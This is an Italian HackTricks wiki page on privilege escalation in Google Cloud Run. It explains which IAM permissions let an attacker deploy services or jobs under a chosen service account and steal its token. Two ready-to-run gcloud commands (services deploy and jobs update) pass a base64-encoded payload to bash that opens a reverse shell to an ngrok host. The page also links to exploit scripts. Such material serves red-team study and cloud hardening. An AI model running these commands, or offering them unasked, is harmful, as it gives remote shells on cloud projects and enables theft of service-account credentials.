GCP - Run Privesc

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

Cloud Run

Per ulteriori informazioni su Cloud Run, controlla:

pageGCP - Cloud Run Enum

run.services.create, iam.serviceAccounts.actAs, run.routes.invoke

Un attaccante con queste autorizzazioni può creare un servizio run eseguendo codice arbitrario (contenitore Docker arbitrario), collegare un Account di Servizio ad esso e fare in modo che il codice esfiltrare il token dell'Account di Servizio dai metadati.

Uno script di exploit per questo metodo può essere trovato qui e l'immagine Docker può essere trovata qui.

Nota che quando si utilizza gcloud run deploy invece di creare solo il servizio è necessaria l'autorizzazione update. Controlla un esempio qui.

run.services.update, iam.serviceAccounts.actAs

Come il precedente ma aggiornando un servizio:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

run.services.setIamPolicy

Assegna a te stesso i permessi precedenti su Cloud Run.

run.jobs.create, run.jobs.run, (run.jobs.get)

Avvia un lavoro con una shell inversa per rubare l'account di servizio indicato nel comando. Puoi trovare un exploit qui.

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Simile al precedente, è possibile aggiornare un lavoro e aggiornare l'account di servizio, il comando ed eseguirlo:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

run.jobs.setIamPolicy

Assegna a te stesso i permessi precedenti su Cloud Jobs.

Riferimenti

Impara l'hacking su AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Last updated